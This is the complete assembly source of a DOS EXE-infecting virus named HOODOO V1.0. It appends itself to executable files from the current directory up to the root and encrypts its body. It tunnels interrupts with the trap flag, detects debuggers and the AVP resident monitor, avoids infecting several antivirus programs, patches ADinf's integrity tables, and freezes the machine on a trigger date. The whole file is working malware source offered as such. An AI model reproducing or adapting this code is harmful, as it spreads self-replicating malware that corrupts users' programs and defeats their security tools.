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- ;****************************************************************************
- ; Virus name : HOODOO V1.0
- ; Author : Infiltrator (FATAL BREAKPOINT BBS)
- ; Origin : St-Petersburg, RUSSIA, January 1, 1996
- ; Compiling : TASM HOODOO.ASM
- ;---------------------------------------------------------------------------
- ; Targets : EXE files from current dir to root
- ; Size : 2609 bytes
- ; Polymorphic : No
- ; Encryption : Yes
- ; Stealth : No
- ; Tunneling : Yes
- ; Retro : Yes
- ; Antiheuristics: Yes
- ;****************************************************************************
- ;===================== Macros used for direct int calls=================
- int_21h Macro
- pushf
- cli
- call dword ptr [real_int21][si]
- Endm
- ;-------------------------------------------------------------------
- int_13h Macro
- pushf
- cli
- call dword ptr [real_int13][si]
- Endm
- ;--------------------------------------------------------------------
- Attributs EQU 15h
- File_time EQU 16h
- File_date EQU 18h
- File_size EQU 1Ah
- File_name EQU 1Eh
- ;--------------------------------------------------------------------
- ;AAM - used to fool some lame analysers
- al_to_ah Macro
- db 0D4h,1
- EndM
- ;--------------------------------------------------------------------
- .model tiny
- .code
- .startup
- .286
- virus_start:
- db 3Eh,0FCh ;fooling code
- push ax bx cx dx si di bp ds ;saving all registers!
- push es
- mov ax,cs
- mov ds,ax
- mov es,ax
- ;Performing old trick
- call old_trick
- old_trick:
- db 26h,0FCh ; fool code
- mov bp,sp
- mov si,ss:[bp]
- inc sp
- inc sp
- sub si,offset old_trick
- lea ax,code_decode[si]
- mov dx,cs
- xor cx,cx
- mov es,cx
- xchg ax,word ptr es:[0]
- xchg dx,word ptr es:[2]
- mov word ptr old_int0[si],ax
- mov word ptr old_int0[si+2],dx
- div cx ;performing a divide by ZERO to call code_decode (en/decryption)
- ;---------------------------[ coded part ]-----------------------------
- code_start:
- mov ax,cs
- mov es,ax
- push si
- xchg bp,si
- lea si,real_jump[bp]
- lea di,current_jump[bp]
- movsw
- movsw ;restoring last jump
- pop si
- xor ax,ax
- push ax
- pop cx
- dec sp
- dec sp
- pop bx
- cmp cx,bx
- jz not_tracing
- mov byte ptr td_present[si],255
- not_tracing:
- ;---------------------------------------------------------------------
- Get_DOS_version:
- mov ax,3001h
- int 21h
- cmp al,5
- jae check_8086
- jmp bad_environment
- check_8086:
- mov byte ptr avp_TSR_present[si],0
- ;--------------------------------------------------------------------
- ;Check if 8086
- push sp
- pop ax
- cmp ax,sp
- jz _286
- jmp bad_environment
- _286:
- ;--------------------------------------------------------------------
- ;Check avp TSR
- call check_avp_TSR
- ;--------------------------------------------------------------------
- ;check for 386+
- mov ax,7000h
- pushf
- push ax
- popf
- pushf
- pop ax
- popf
- and ax,7000h ; check for flag
- jz short _80286 ; if ax=0 then this is a 80286
- ;--------------------------------------------------------------------
- ;Check OS/2
- mov ax,4010h
- int 2Fh
- cmp ax,4010h
- jz No_OS2
- jmp bad_environment
- No_OS2:
- ;--------------------------------------------------------------------
- _80286:
- ;Find DOS segment
- mov ah,34h
- int 21h ;DOS activity flag
- mov word ptr [real_int21+2][si],es ;store DOS seg
- mov ax,3501h
- int 21h
- mov word ptr [old_int1][si],bx
- mov word ptr [old_int1+2][si],es ;saving old int1
- mov ah,25h
- lea dx,trace_handler[si]
- int 21h ;setting int1 handler
- mov search_DOS[si],0
- mov trace_report[si],0
- xor ax,ax
- mov es,ax
- pushf
- pop ax
- or ah,1 ; turn on trap flag
- push ax
- in al,21h ; Get old IMR
- mov IMR[si],al
- mov al,0FFh ; disable all interrupts
- out 21h,al
- popf
- mov dl,80h ;Drive C:
- mov ah,9 ;reset HD controller
- pushf
- call dword ptr es:[13h*4] ;simulate int 13h
- pushf
- pop ax
- or ah,1 ;Set TF for 2-nd tracing
- push ax
- popf
- mov search_DOS[si],1
- xor ax,ax
- mov es,ax
- mov ax,3001h ;Get DOS version
- pushf
- call dword ptr es:[21h*4] ;Simulate int 21h
- pushf
- pop ax
- and ax,0FEFFh ;clear TF
- push ax
- popf
- mov al,IMR[si] ; reenable interrupts
- out 21h,al
- test trace_report[si],1
- jnz traced_13
- jmp bad_environment
- traced_13:
- ;------------------------------------------------------------------------
- ;Check avp TSR presence
- cmp byte ptr avp_TSR_present[si],0
- jz avp_not_present
- call time_has_come
- avp_not_present:
- ;------------------------------------------------------------------------
- ;test bit 1 of TD_presence
- test byte ptr td_present[si],1
- jz td_not_present
- call time_has_come
- td_not_present:
- ;------------------------------------------------------------------------
- db 36h,0FBh ;fooling code
- mov ah,4
- int 1Ah ;Get date
- cmp dl,21h ;day 21?
- jnz not_yet
- call time_has_come
- not_yet:
- ;-----------------------------------------------------------------------
- test trace_report[si],2
- jnz traced_21
- jmp bad_environment
- ;-----------------------------------------------------------------------
- ;setting vector 13 to BIOS
- ;-----------------------------------------------------------------------
- traced_21:
- db 26h, 0F8h ;fooling code
- xor ax,ax
- mov es,ax ;additionnal warranty
- push word ptr es:[13h*4]
- push word ptr es:[13h*4+2] ;old vector 13
- push word ptr [real_int13][si]
- push word ptr [real_int13+2][si] ;real vector 13
- cli
- pop word ptr es:[13h*4+2]
- pop word ptr es:[13h*4] ;Critical !
- sti
- pop word ptr [real_int13+2][si]
- pop word ptr [real_int13][si]
- ;------------------------------------------------------------------
- ; restoring int1
- ;------------------------------------------------------------------
- push word ptr [old_int1][si]
- push word ptr [old_int1+2][si]
- cli
- pop word ptr es:[1*4+2]
- pop word ptr es:[1*4]
- sti
- ;get current default drive
- mov ah,19h
- int 21h
- cmp al,2 ;don't infect floppies
- jnc get_free_disk_space
- jmp bad_environment
- get_free_disk_space:
- mov ah,36h
- xor dl,dl
- int 21h
- cmp ax,0FFFFh
- jnz check_for_20k
- jmp bad_environment
- check_for_20k:
- mul cx
- mul bx
- or dx,dx
- jnz enough_disk_space
- cmp ax,20*1024 ;check if there are 20 kb free!
- jnc enough_disk_space
- jmp bad_environment
- enough_disk_space:
- ;---------------------------------------------------------------
- ;Get initial dir
- xchg si,bp ;store SI value!
- mov ah,47h
- xor dl,dl
- lea si,initial_dir[bp+1]
- int 21h
- xchg si,bp
- ;-----------------------------------------------------------------
- ;Get old DTA address into ES:BX
- mov ah,2Fh
- int 21h
- mov word ptr [old_DTA][si],bx
- mov word ptr [old_DTA+2][si],es
- ;-----------------------------------------------------------------
- ;Set new DTA
- mov ah,1Ah
- lea dx,DTA[si]
- int 21h
- ;=================== Searching and infecting ====================
- in al,21h
- mov IMR[si],al
- or al,2 ;masking kb interrupts
- out 21h,al
- mov bingo[si],0
- Find_first_EXE:
- mov ah,4Eh
- lea dx,exe_mask[si]
- int_21h
- cmp al,12h
- jz no_more_exe_files
- call infect_file
- Find_next_EXE:
- mov ah,4Fh
- lea dx,exe_mask[si]
- int_21h
- cmp al,12h
- jz no_more_exe_files
- call infect_file
- jmp short Find_next_EXE
- no_more_exe_files:
- ;--------------------------------------------------------------
- ;Change to upper dir
- mov ah,3Bh
- lea dx,upper_dir[si]
- int_21h
- jnc Find_first_EXE
- ;---------------------------------------------------------------
- ;Guess what
- cmp bingo[si],0
- jz no_need_adinf
- call kill_adinf
- no_need_adinf:
- ;======================== Infections achieved! =================
- ;Returning to initial dir
- mov ah,3Bh
- lea dx,initial_dir[si]
- int_21h
- mov al,IMR[si]
- out 21h,al ;re-enabling kb interrupts
- ;Restoring Old DTA
- push ds
- mov dx,word ptr old_DTA[si] ;offset
- mov ax,word ptr old_DTA[si+2] ;seg
- mov ds,ax
- mov ah,1Ah
- int 21h
- pop ds
- ;-----------------------------------------------------------------
- ; restore int13
- ;-----------------------------------------------------------------
- xor ax,ax
- mov es,ax ;additional warranty
- push word ptr es:[13h*4]
- push word ptr es:[13h*4+2] ;real vector 13
- push word ptr [real_int13][si]
- push word ptr [real_int13+2][si] ;old vector 13
- cli
- pop word ptr es:[13h*4+2]
- pop word ptr es:[13h*4] ;Critical!
- sti
- pop word ptr [real_int13+2][si]
- pop word ptr [real_int13][si]
- ;----------------------------------------------------------------------
- ;restore int 0
- ;----------------------------------------------------------------------
- mov ax,word ptr old_int0[si]
- mov dx,word ptr old_int0[si+2]
- xchg ax,es:[0]
- xchg dx,es:[2]
- ;--------------------------------------------------------------------
- bad_environment:
- pop es
- mov ax,es ;AX = PSP segment
- add ax,10h ;Adjust for PSP
- add word ptr [current_jump+2][si],ax
- jmp $+2
- ; mov ah,9
- ; lea dx,msg[si]
- ; int 21h
- pop ds bp di si dx cx bx ax ;restoring all registers!
- db 0EAh
- current_jump dd 0
- real_jump dw offset virus_end,0-10h
- initial_dir db '\',64 dup(0)
- upper_dir db '..',0
- exe_mask db '*.exe',0
- header db 18h dup(0) ;exe-header
- bingo db 0 ;=1 when infection has occured
- ;and need to patch adinf
- adinf_path db '*.*',0
- ad_table db 13 dup(0)
- buffer db 512 dup(0) ;needed to read adinf table
- old_DTA dd 0
- DTA db 128 dup(0)
- real_int13 dd 0
- search_DOS db 0
- old_int1 dd 0
- trace_report db 0
- IMR db 0
- msg db 13,10,7,7,"HOODOO V1.0 (c)1995 by Infiltrator. "
- db "Please register.$"
- ;Need to fuck avp
- antiviral_msg db 20h,0Dh,0Ah,'Antiviral$'
- antimsg_len equ $-antiviral_msg
- ;Need to fuck avp TSR
- avp_TSR_present db 0
- ;=======================[ TRACE HANDLER ]================================
- trace_handler:
- push bp ax cx es si
- mov bp,sp
- cmp search_DOS[si],1
- je skip_13
- mov ax,ss:[bp+12] ;CS
- cmp ax,0C000h
- jb exit_trace
- mov ax,ss:[bp+10] ;IP
- mov cl,4
- shr ax,cl
- add ax,ss:[bp+12]
- jc exit_trace ;0FFFFh seg overflow
- mov ax,ss:[bp+10]
- mov word ptr ds:[real_int13][si],ax
- mov ax,ss:[bp+12]
- mov word ptr ds:[real_int13+2][si],ax
- or trace_report[si],1 ;mark as found
- jmp short found_13
- skip_13:
- mov ax,ss:[bp+12] ;DOS CS
- cmp ax,word ptr ds:[real_int21+2][si]
- jnz exit_trace
- mov ax,ss:[bp+10]
- mov word ptr ds:[real_int21][si],ax ;DOS IP
- or trace_report[si],2 ;mark as found
- found_13:
- mov ax,ss:[bp+14]
- and ax,0FEFFh ;clear TF in stack
- mov ss:[bp+14],ax
- exit_trace:
- pop si es cx ax bp
- iret
- ;====================[ Infecting file ]==================================
- infect_file proc
- ;Preparing encrypting value
- retry_value:
- mov ah,0
- int 1Ah
- or dl,dl
- jz retry_value
- mov encrypt_value[si],dl
- mov ax,4301h
- xor cx,cx
- lea dx,[DTA+File_name][si]
- int 21h ;clear attributs
- mov al,3Dh
- al_to_ah
- mov al,02h
- ; mov ax,3D02h
- lea dx,[DTA+File_name][si]
- int_21h
- xchg bx,ax
- mov al,3Fh
- al_to_ah
- ; mov ah,3Fh
- mov cx,18h ;read header
- lea dx,header[si]
- int_21h
- ;Check for 0E9h
- cmp byte ptr ds:[header+si],0E9h ;misnamed COM
- jnz check_for_EB
- jmp close_file
- check_for_EB:
- cmp byte ptr ds:[header+si],0EBh ;misnamed COM
- jnz check_4_MZ
- jmp close_file
- Check_4_MZ:
- cmp word ptr ds:[header+si],'ZM' ;Real EXE file?
- jz check_4_size
- jmp close_file
- check_4_size:
- cmp word ptr [DTA+file_size+2][si],0
- jnz size_ok
- cmp word ptr [DTA+file_size][si],20*1024 ;20kb
- jnc size_ok
- jmp close_file
- size_ok:
- mov ax,4200h
- mov cx,word ptr [DTA+File_size+2][si]
- mov dx,word ptr [DTA+File_size][si]
- dec dx ;point to last word in file
- dec dx
- int_21h
- ;Check if already infected
- mov ah,3Fh
- mov cx,2 ;read 2 bytes
- lea dx,ID_word[si]
- int_21h
- mov ax,ID_word[si]
- cmp ax,word ptr [DTA+16h][si]
- jnz not_infected
- jmp close_file
- not_infected:
- ;----------------------------------------------------------------------
- ;Check if it's aidstest
- mov ax,4200h
- xor cx,cx
- mov dx,131 ;offset in aidstest.exe
- int 21h
- mov ah,3Fh
- mov cx,23 ;read bytes
- lea dx,buffer[si]
- int 21h
- cmp byte ptr buffer[si],''
- jz other_smile
- jmp not_aidstest
- other_smile:
- cmp byte ptr buffer[si+22],''
- jnz not_aidstest
- jmp close_file
- not_aidstest:
- ;----------------------------------------------------------------------
- ;Check if it's web
- mov ax,4200h
- xor cx,cx
- mov dx,29h ;offset in drweb.exe
- int 21h
- mov ah,3Fh
- mov cx,4 ;read bytes
- lea dx,buffer[si]
- int 21h
- mov al,''
- cmp byte ptr buffer[si],al
- jz other_face
- jmp not_web
- other_face:
- cmp byte ptr buffer[si+3],al
- jnz not_web
- jmp close_file
- not_web:
- ;----------------------------------------------------------------------
- ;Check if it's adinf
- mov ax,4200h
- xor cx,cx
- mov dx,29h ;offset in adinf.exe
- int 21h
- mov ah,3Fh
- mov cx,8 ;read bytes
- lea dx,buffer[si]
- int 21h
- mov al,''
- cmp byte ptr buffer[si],al
- jz second_face
- jmp not_adinf
- second_face:
- cmp byte ptr buffer[si+7],al
- jnz not_adinf
- jmp close_file
- not_adinf:
- ;----------------------------------------------------------------
- ;Check if Norton Antivirus 2.0
- mov ax,4200h
- xor cx,cx
- mov dx,32h ;offset in nav.exe
- int 21h
- mov ah,3Fh
- mov cx,8
- lea dx,buffer[si]
- int 21h
- ;check for 'Sy' (Symantec)
- cmp word ptr buffer[si],7953h
- jz check_ec
- jmp not_nav20
- ;check for 'ec'
- check_ec:
- cmp word ptr buffer[si+6],6365h
- jnz not_nav20
- jmp close_file
- not_nav20:
- ;-------------------------------------------------------------------
- ;Checking for overlay and infecting
- mov al,42h
- al_to_ah
- mov al,02h
- ; mov ax,4202h
- cwd
- xor cx,cx
- int_21h ;EOF
- push bx
- push ax
- push dx
- call convert_size_to_pages
- cmp dx,word ptr [header+4][si]
- jz ovl1
- pop dx
- pop ax
- pop bx ;handle
- jmp close_file
- ovl1:
- cmp ax,word ptr [header+2][si] ;checking for overlay
- jz ovl2
- pop dx
- pop ax
- pop bx ;handle
- jmp close_file
- ovl2:
- pop dx
- pop ax
- push ax
- push dx
- mov cx,word ptr [header+14h][si]
- mov word ptr [real_jump][si],cx ;IP
- mov cx,word ptr [header+16h][si]
- mov word ptr [real_jump+2][si],cx ;CS
- mov bx,word ptr [header+8][si]
- mov cl,4
- shl bx,cl
- sub ax,bx
- sbb dx,0 ;sub header from file size
- mov cx,10h
- div cx ;convert to seg:offset
- mov word ptr [header+14h][si],dx ;New entry point
- mov word ptr [header+16h][si],ax
- mov word ptr [header+0Eh][si],ax ;new stack segment
- mov ah, byte ptr [DTA+File_date][si] ;ah=high byte of date (year)
- mov al, byte ptr [DTA+File_size][si] ;al=low byte of file size
- mov word ptr [header+10h][si],ax ;New SP
- pop dx
- pop ax
- add ax,virus_end-virus_start
- adc dx,0
- call convert_size_to_pages
- mov word ptr [header+4][si],dx ;new file size
- mov word ptr [header+2][si],ax
- add word ptr [header+0Ah][si],virus_end-virus_start
- jnc $+8
- mov word ptr [header+0Ah][si],0FFFFh ;min alloc
- add word ptr [header+0Ch][si],virus_end-virus_start
- jnc $+8
- mov word ptr [header+0Ch][si],0FFFFh ;max alloc
- ;NEED to correct ID word HERE!
- mov ax,word ptr [DTA+16h][si]
- mov word ptr ID_word[si],ax
- pop bx ;restore handle
- mov al,40h
- al_to_ah
- ; mov ah,40h
- mov cx,virus_end-virus_start
- lea dx,virus_start[si]
- code_mid1:
- ; call code_decode ;encrypting virus to be linked
- div al
- int_21h ;append virus to file
- xor ax,ax
- div al
- ; call code_decode ;de-crypting virus
- code_mid2:
- mov bingo[si],1
- mov ax,4200h
- cwd
- xor cx,cx
- int_21h
- mov al,40h
- al_to_ah
- ; mov ah,40h
- mov cx,18h
- lea dx,header[si] ;write new header to file
- int_21h
- ;Need to restore time and date
- mov al,57h
- al_to_ah
- mov al,1
- ; mov ax,5701h
- mov cx,word ptr [DTA+16h][si] ;original time
- mov dx,word ptr [DTA+18h][si] ;original date
- int_21h
- Close_file:
- mov al,3Eh
- al_to_ah
- ; mov ah,3Eh
- int_21h ;close file
- ;Need to restore attributs
- mov al,43h
- al_to_ah
- mov al,1
- ; mov ax,4301h
- mov cx,word ptr [DTA+15h][si] ;original attributs
- lea dx,word ptr [DTA+1Eh][si] ;file name
- int_21h
- retn
- infect_file endp
- ;======================[ Time has come ]===============================
- time_has_come proc
- in al,21h
- mov IMR[si],al
- or al,2
- out 21h,al ;mask KB interrupts
- lea dx,msg[si]
- mov ah,9
- int 21h
- jmp $ ;lock !
- time_has_come endp
- ;=============================[ Check avp TSR]===============================
- check_avp_TSR proc
- pusha
- mov ax,0Ah
- mov es,ax
- xchg bp,si ;store SI
- mov di,452h
- lea si,antiviral_msg[bp]
- mov cx,antimsg_len
- repnz movsb ;storing 'Antiviral' at 452h
- xchg si,bp ;restore SI
- mov ah,46h
- mov bx,1
- mov cx,1
- int 21h ;redirect CON to NUL
- push ds
- mov ax,0Ah
- mov ds,ax
- mov ah,9
- mov dx,452h
- mov cx,2D64h ;check if avp is installed
- int 21h
- pop ds
- push cx
- mov ah,46h
- mov bx,0
- mov cx,1
- int 21h ;restoring CON
- pop cx
- cmp cx,736Dh
- jnz no_avp
- mov byte ptr avp_TSR_present[si],1
- no_avp:
- mov ax,0Ah
- mov es,ax
- mov di,452h
- mov cx,antimsg_len
- repnz stosb ;restoring '0' at 452h
- popa
- ret
- check_avp_TSR endp
- ;=======================[ Converting size to pages ]==========================
- convert_size_to_pages proc
- push ax
- mov cl,7
- shl dx,cl
- and ax,0FE00h
- mov cl,9
- shr ax,cl
- add dx,ax
- pop ax
- and ax,1FFh
- jz $+3
- inc dx
- retn
- convert_size_to_pages endp
- ;==========================[ Kill adinf ]===============================
- Kill_adinf proc
- pusha
- mov ax,cs
- mov es,ax
- mov ah,4Eh ;Find first
- ; mov al,4Eh
- ; al_to_ah
- mov cx,2 ;find all hidden files!
- lea dx,adinf_path[si]
- int_21h
- cmp al,12h
- jz patch_done
- call patch_adinf
- next_table:
- mov ah,4Fh
- ; mov al,4Fh
- ; al_to_ah
- mov cx,2
- lea dx,adinf_path[si]
- int_21h
- cmp al,12h
- jz patch_done
- call patch_adinf
- jmp short next_table
- patch_done:
- popa
- ret
- Kill_adinf endp
- ;===========================[ Patch adinf ]===============================
- patch_adinf proc
- lea bx,[DTA+1Eh][si] ;file name in DTA
- lea di,ad_table[si]
- next_letter:
- mov al,[bx]
- inc bx
- stosb
- or al,al
- jnz next_letter
- mov ax,4301h
- ; mov al,43h
- ; al_to_ah
- ; mov al,1
- xor cx,cx
- lea dx,ad_table[si]
- int_21h
- mov ax,3D02h
- ; mov al,3Dh
- ; al_to_ah
- ; mov al,02h
- lea dx,ad_table[si]
- int_21h
- xchg ax,bx
- mov ax,4200h
- ; mov al,42h
- ; al_to_ah
- ; mov al,0
- xor cx,cx
- mov dx,68h ;point at 'Advanced Diskinfoscope...'
- int_21h
- mov ah,3Fh
- ; mov al,3Fh
- ; al_to_ah
- mov cx,70h
- lea dx,buffer[si]
- int_21h
- cmp word ptr [buffer+si],'dA'
- jnz fake_adinf
- cmp word ptr [buffer+49h][si],'��'
- jnz fake_adinf
- mov ax,4200h
- ; mov al,42h
- ; al_to_ah
- ; mov al,0
- xor cx,cx
- mov dx,200h
- int_21h
- mov ah,40h
- mov buffer[si],0
- lea dx,buffer[si]
- mov cx,1 ;1 byte patch!
- int_21h
- fake_adinf:
- mov ax,5701h ;restoring
- ; mov al,57h
- ; al_to_ah
- ; mov al,1
- mov cx,word ptr ds:[DTA+16h][si] ;file time
- mov dx,word ptr ds:[DTA+18h][si] ;file date
- int_21h
- mov ah,3Eh
- ; mov al,3Eh
- ; al_to_ah
- int_21h
- mov ax,4301h
- ; mov al,43h
- ; al_to_ah
- ; mov al,1
- mov cl,byte ptr ds:[DTA+15h][si]
- xor ch,ch
- lea dx,ad_table[si]
- int_21h ;restore attributs
- retn
- patch_adinf endp
- ;========================[ Mark end of encryption ]=====================
- code_end:
- ;=========================[ Encoding/decoding ]=========================
- code_decode proc
- push ax bx cx di es bp
- mov bp,sp
- add word ptr ss:[bp+12],2 ;coz it still points to 'div cx'
- push cs
- pop es
- lea bx,code_start[si]
- mov di,bx
- mov cx,code_mid1-code_start
- call crypt_cycle ;crypt/decrypting 1-st half
- lea bx,code_mid2[si]
- mov di,bx
- mov cx,code_end-code_mid2
- call crypt_cycle ;crypt/decrypting 2-nd half
- pop bp es di cx bx ax
- retf 2
- code_decode endp
- ;==========================[ Encrypting cycle ]=========================
- crypt_cycle proc
- do_crypt:
- mov al,[bx]
- xor al,encrypt_value[si]
- stosb
- inc bx
- ;Test turbo debugger presence inside loop
- push cs
- pop ss
- pushf
- pop ax
- mov byte ptr td_present[si],ah ;Trap bit stored.
- loop do_crypt
- retn
- crypt_cycle endp
- ;=========================[Various values]=================================
- ;Placed here to avoid encryption!
- real_int21 dd 0
- old_int0 dd 0
- ;Need to fuck turbo debugger
- td_present db 0
- ;=========================[ Encrypt value ]==============================
- encrypt_value db 0
- ;========================[ ID BYTE ]=====================================
- ID_word dw 0
- ;=======================[ Part to be cutted off ]========================
- virus_end:
- db 0B8h,0,4Ch
- db 0CDh,21h
- ;========================================================================
- end
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